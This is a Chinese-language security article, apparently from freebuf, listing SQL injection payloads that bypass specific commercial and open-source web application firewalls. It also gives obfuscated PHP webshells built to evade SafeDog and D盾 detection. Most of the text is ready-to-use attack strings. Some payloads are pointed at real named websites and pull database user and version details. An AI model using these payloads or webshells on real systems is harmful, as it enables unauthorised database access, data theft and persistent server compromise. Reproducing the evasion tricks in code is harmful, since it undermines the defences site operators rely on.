常见WAF绕过 – 作者:凯信特安全团队

                                                                                 常见WAF绕过

PHPIDS

0.6.1.1默认规则 ：

拒绝：/?id=1+union+select+user,password+from+mysql.user+where+user=1

允许：/?id=1+union+select+user,password+from+mysql.user+limit+0,1 

拒绝： /?id=1+OR+1=1

允许： /?id=1+OR+0x50=0x50

 

拒绝：/?id=substring((1),1,1)

允许： /?id=mid((1),1,1)

 

Mod_Security

2.5.9默认规则：

拒绝： /?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74

允许： /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

 

拒绝： /?id=1+OR+1=1

允许： /?id=1+OR+0x50=0x50

 

拒绝： /?id=1+and+5=6

允许： /?id=1+and+5!=6

 

拒绝： /?id=1;drop members

允许：/?id=1;delete members

          /?id=(1);exec(‘sel’+’ect(1)’+’,(xxx)from’+’yyy’)

  

Modsecurity WAF Bypass vectors

 –new version–

id=@:=(– a %0a select 123 from {ftable})|0.1union– a %0a select+1,@,3

id=@:=(– a %0a select 123 from {ftable})*.9union/*!%0aselect 1,@,3*/

id=@:=(%23 a %0a select 123 from {ftable})-\Nunion%23 a %0a select+1,@,3

id=@:=(%23 a %0a select 123 from((table)))/1e0union%23 a %0a select+1,@,3

id=@:=(%23 a %0a select 123 from((table)))/1e0union%a0(select 1,@,3)

 

–old version–

id=1-.0union distinctrow select 1,2,3from {f table}

id=-1 /*!50000union*/ select 1,2,.3fromtable

id=-1e0union distinct select 1,2,3e0fromtable

id=\Nunion (select 1,2,\Nfrom table)

id=.1union distinct select sql_cache1,2,3 from table

 

安全狗

 /*|–|*/代替空格

/*.*.*.*/  代替空格。

%1f 绕过空格

/*/#\*/ 代替空格。

/*/*/ 替换空格

 http://www.safedog.cn/?id=/*’unionselect 1,2 from users%23*/

http://www.safedog.cn/?id=’ — ‘ unionselect 1,2 from users%23

http://www.safedog.cn/?id=%20/*%27%20union%20select%20%27*/%27,2%20from%20users%23

 /*!50001and*/

/*!50001union*/

/*!50003select*/

/*!50001from*/    数字不以0结尾

/*!union/*!*/

/*!select/*!*/

 

过狗SHELL

<?php

$id=’xx’;

//if (empty($_POST[$id]) &&empty($_GET[$id])) header(‘HTTP/1.1 404’);

$config =array(‘ynir’=>’type’,’abvgpahs_rgnrep’=>’crfu’);$config =array_flip($config);

$de =function(&$value){$value=strrev(str_rot13($value));};array_walk($config,$de);

@$config[‘recv’] =isset($_POST[$id])?$_POST[$id]:$_GET[$id];

$fun = function() use ($config){return$config[‘crfu’](‘$pa’, “{$config[‘type’]}”.'($pa);’);};

$have = $fun();$have($config[‘recv’]);

?>

 

<?php

$ab = $_REQUEST[‘d’];

$a[‘t’] = “”;//主要带对象 D盾就不管后面的了。。。

eval($a[‘t’].$ab);

 

<?php$_POST[‘xx’]($_POST[‘oo’]);?>

xx=assert&oo=phpinfo()

 <?phpeval(getallheaders()[‘Accept‐Language’])

 <?php$a=getallheaders()[‘xxx’];$a(getallheaders()[‘ooo’]);>

 <?php eval(gzuncompress(base64_decode(getallheaders()[‘xx’])))

 

云锁

 1.php?id=-1 union(select1,2,3,@@datadir,5,6,7,8,9,10,11,12,13,14,15,16,17) （union与select 中间加个“（”）

 2.将空格替换成/*/*/

 3.?id=/*’ union select 1,2 from users%23*/ （把SQL语句写在  /*’    */  里面）

 

http://www.yunsuo.com.cn/?id=/*’ unionselect ‘*/’,2 from users%23

http://www.yunsuo.com.cn/?id=/*%27%20union%20select%20%27*/%27,2%20from%20users%23

 

Sucuri

 最新版sucuri waf绕过

index.php?id=\NUNION(SElecT-1,current_user,3,4,5,6,7,8,9,10,11)—

 

http://www.uaebf.ae/Press-Release.php?id=189%20and%20@x%20:%3dconcat_ws%280×20%2c%30x6279207a6875746f756767,0x3c62723e,0x56657273696f6e203a3a20,@@global%2eversion,0x3c62723e,0x55736572203a3a20,current_user%29%20having%20.0UnIOn–%20-%0aSeLe%43t~1%2c@%78,~3,~4,~5,~6,~7,~8,~9,~10,%30×27–%20-

 

http://www.uaebf.ae/Press-Release.php?id=189-length(user())

http://www.uaebf.ae/Press-Release.php?id=189-casewhen user(+)  like’uaebf_DuB6Fuser7@localhost’ then 1 else 2 end

http://www.uaebf.ae/Press-Release.php?id=189-casewhen right(user(+),1) like ‘t’ then 1 else 2 end

 

WatchGuard

 watchguard WAF绕过

http://aquatlantis.asia/index.php?id=308&amp;amp;tbl=registoshaving0/*!50000union*//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//**//*!50000select*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,user(),73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160—

 

Ngx_lua_waf

 http://192.168.8.147/test/sql.aspx?id=1UNION/*&ID=*/SELECT null,name,null/*&Id=*/FROM master.dbo.sysdatabases

 

libinjection

http://test.com/sqli.mysql.php?id=1union select !<1,database() from tables

 

D盾

 http://192.168.8.161/sql.aspx?id=1【Fuzz位置】union selectnull,null,SYSTEM_USER

http://192.168.8.161/sql.aspx?id=1.eunionselect null,null,SYSTEM_USER

 结合IIS获取参数位置顺序：GET,POST,COOKIE

来源：freebuf.com 2020-02-29 22:22:54 by: 凯信特安全团队